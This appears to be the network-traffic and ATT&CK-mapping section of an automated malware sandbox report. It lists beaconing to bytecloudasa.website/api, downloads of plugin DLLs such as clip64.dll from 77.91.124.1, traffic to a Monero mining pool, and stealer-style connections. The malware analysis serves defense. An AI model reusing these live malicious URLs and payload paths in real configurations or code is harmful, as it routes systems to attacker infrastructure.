http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
7
6

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

18.6kB
1.8kB
18
17

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.3kB
1.4kB
9
6

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
194.169.175.127:80

http://host-host-file8.com/

http

Explorer.EXE

751 B
362 B
6
4

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200
77.91.124.1:80

http://77.91.124.1/theme/Plugins/clip64.dll

http

explothe.exe

3.8kB
94.8kB
75
74

HTTP Request

GET http://77.91.124.1/theme/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.124.1/theme/Plugins/clip64.dll

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

404.9kB
9.4kB
294
207

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

2ry631Xj.exe

260 B
5
77.91.124.55:19071

AppLaunch.exe

260 B
5
162.159.130.233:443

cdn.discordapp.com

tls

csrss.exe

1.1kB
4.6kB
11
12
185.82.216.49:443

server14.cdntokiog.studio

tls

csrss.exe

1.8kB
7.6kB
14
16
188.114.96.1:443

walkinglate.com

tls

csrss.exe

75.2kB
2.2MB
1378
1619
77.91.124.55:19071

2ry631Xj.exe

260 B
5
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

AppLaunch.exe

260 B
5
51.15.58.224:14433

xmr-eu1.nanopool.org

tls

explorer.exe

1.5kB
3.8kB
11
9
104.20.67.143:443

pastebin.com

tls

explorer.exe

1.0kB
6.0kB
11
11
163.172.154.142:14433

xmr-eu1.nanopool.org

tls

explorer.exe

1.4kB
3.8kB
9
10
77.91.124.55:19071

2ry631Xj.exe

208 B
4
77.91.124.55:19071

AppLaunch.exe

208 B
4
77.91.124.55:19071

AppLaunch.exe

208 B
4

8.8.8.8:53

138.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

138.32.126.40.in-addr.arpa
8.8.8.8:53

126.177.238.8.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

126.177.238.8.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

146.78.124.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

146.78.124.51.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

54.120.234.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

54.120.234.20.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

www.facebook.com

dns

msedge.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.247.35
8.8.8.8:53

accounts.google.com

dns

msedge.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
142.250.179.141:443

accounts.google.com

https

msedge.exe

12.4kB
244.3kB
117
237
8.8.8.8:53

35.247.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.247.240.157.in-addr.arpa
8.8.8.8:53

static.xx.fbcdn.net

dns

msedge.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

157.240.30.27
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

195.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.179.250.142.in-addr.arpa
8.8.8.8:53

131.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

131.179.250.142.in-addr.arpa
8.8.8.8:53

27.30.240.157.in-addr.arpa

dns

72 B
116 B
1
1

DNS Request

27.30.240.157.in-addr.arpa
8.8.8.8:53

facebook.com

dns

msedge.exe

58 B
74 B
1
1

DNS Request

facebook.com

DNS Response

157.240.30.35
8.8.8.8:53

fbcdn.net

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbcdn.net

DNS Response

157.240.30.35
8.8.8.8:53

play.google.com

dns

msedge.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.250.179.206
8.8.8.8:53

100.39.251.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

100.39.251.142.in-addr.arpa
8.8.8.8:53

35.30.240.157.in-addr.arpa

dns

72 B
125 B
1
1

DNS Request

35.30.240.157.in-addr.arpa
142.250.179.206:443

play.google.com

https

msedge.exe

7.6kB
9.2kB
17
22
8.8.8.8:53

fbsbx.com

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbsbx.com

DNS Response

157.240.30.35
8.8.8.8:53

206.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

206.179.250.142.in-addr.arpa
224.0.0.251:5353

594 B
9
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

103.169.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

103.169.127.40.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

211.92.42.5.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

211.92.42.5.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

254.178.238.8.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

254.178.238.8.in-addr.arpa
8.8.8.8:53

1.124.91.77.in-addr.arpa

dns

140 B
166 B
2
2

DNS Request

1.124.91.77.in-addr.arpa

DNS Request

1.124.91.77.in-addr.arpa
8.8.8.8:53

158.240.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

158.240.127.40.in-addr.arpa
8.8.8.8:53

222.70.216.185.in-addr.arpa

dns

146 B
266 B
2
2

DNS Request

222.70.216.185.in-addr.arpa

DNS Request

222.70.216.185.in-addr.arpa
8.8.8.8:53

pastebin.com

dns

explorer.exe

116 B
212 B
2
2

DNS Request

pastebin.com

DNS Response

172.67.34.170

104.20.67.143

104.20.68.143

DNS Request

pastebin.com

DNS Response

172.67.34.170

104.20.67.143

104.20.68.143
8.8.8.8:53

171.176.209.85.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

171.176.209.85.in-addr.arpa
8.8.8.8:53

170.34.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

170.34.67.172.in-addr.arpa
8.8.8.8:53

tak.soydet.top

dns

32DB.exe

60 B
76 B
1
1

DNS Request

tak.soydet.top

DNS Response

95.217.246.182
8.8.8.8:53

182.246.217.95.in-addr.arpa

dns

73 B
131 B
1
1

DNS Request

182.246.217.95.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

34B0.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

172.67.75.172

104.26.13.31

104.26.12.31
8.8.8.8:53

172.75.67.172.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

172.75.67.172.in-addr.arpa

DNS Request

172.75.67.172.in-addr.arpa
8.8.8.8:53

bytecloudasa.website

dns

RegSvcs.exe

66 B
98 B
1
1

DNS Request

bytecloudasa.website

DNS Response

172.67.212.39

104.21.61.162
8.8.8.8:53

39.212.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

39.212.67.172.in-addr.arpa
8.8.8.8:53

bytecloudasa.website

dns

RegSvcs.exe

66 B
98 B
1
1

DNS Request

bytecloudasa.website

DNS Response

104.21.61.162

172.67.212.39
8.8.8.8:53

162.61.21.104.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

162.61.21.104.in-addr.arpa

DNS Request

162.61.21.104.in-addr.arpa
8.8.8.8:53

bytecloudasa.website

dns

RegSvcs.exe

132 B
196 B
2
2

DNS Request

bytecloudasa.website

DNS Response

172.67.212.39

104.21.61.162

DNS Request

bytecloudasa.website

DNS Response

172.67.212.39

104.21.61.162
8.8.8.8:53

host-file-host6.com

dns

65 B
138 B
1
1

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

65 B
81 B
1
1

DNS Request

host-host-file8.com

DNS Response

194.169.175.127
8.8.8.8:53

127.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

127.175.169.194.in-addr.arpa
8.8.8.8:53

bytecloudasa.website

dns

RegSvcs.exe

66 B
98 B
1
1

DNS Request

bytecloudasa.website

DNS Response

104.21.61.162

172.67.212.39
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa
8.8.8.8:53

f26dd3fb-f6e1-4acd-91d6-b74a725e7597.uuid.cdntokiog.studio

dns

csrss.exe

104 B
163 B
1
1

DNS Request

f26dd3fb-f6e1-4acd-91d6-b74a725e7597.uuid.cdntokiog.studio
8.8.8.8:53

cdn.discordapp.com

dns

csrss.exe

128 B
144 B
2
1

DNS Request

cdn.discordapp.com

DNS Request

cdn.discordapp.com

DNS Response

162.159.130.233

162.159.135.233

162.159.133.233

162.159.129.233

162.159.134.233
8.8.8.8:53

server14.cdntokiog.studio

dns

csrss.exe

142 B
87 B
2
1

DNS Request

server14.cdntokiog.studio

DNS Request

server14.cdntokiog.studio

DNS Response

185.82.216.49
8.8.8.8:53

stun.sipgate.net

dns

csrss.exe

124 B
182 B
2
1

DNS Request

stun.sipgate.net

DNS Request

stun.sipgate.net

DNS Response

3.33.249.248

15.197.250.192
3.33.249.248:3478

stun.sipgate.net

csrss.exe

48 B
124 B
1
1
8.8.8.8:53

walkinglate.com

dns

csrss.exe

61 B
93 B
1
1

DNS Request

walkinglate.com

DNS Response

188.114.96.1

188.114.97.1
8.8.8.8:53

88.156.103.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

88.156.103.20.in-addr.arpa
8.8.8.8:53

248.249.33.3.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

248.249.33.3.in-addr.arpa
8.8.8.8:53

233.130.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.130.159.162.in-addr.arpa
8.8.8.8:53

49.216.82.185.in-addr.arpa

dns

72 B
95 B
1
1

DNS Request

49.216.82.185.in-addr.arpa
8.8.8.8:53

1.96.114.188.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

1.96.114.188.in-addr.arpa
8.8.8.8:53

xmr-eu1.nanopool.org

dns

explorer.exe

66 B
210 B
1
1

DNS Request

xmr-eu1.nanopool.org

DNS Response

51.255.34.118

51.15.193.130

51.15.58.224

212.47.253.124

135.125.238.108

51.68.143.81

163.172.154.142

51.68.190.80

51.15.65.182
8.8.8.8:53

pastebin.com

dns

explorer.exe

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

104.20.67.143

172.67.34.170

104.20.68.143
8.8.8.8:53

224.58.15.51.in-addr.arpa

dns

71 B
117 B
1
1

DNS Request

224.58.15.51.in-addr.arpa
8.8.8.8:53

143.67.20.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

143.67.20.104.in-addr.arpa
8.8.8.8:53

142.154.172.163.in-addr.arpa

dns

74 B
123 B
1
1

DNS Request

142.154.172.163.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery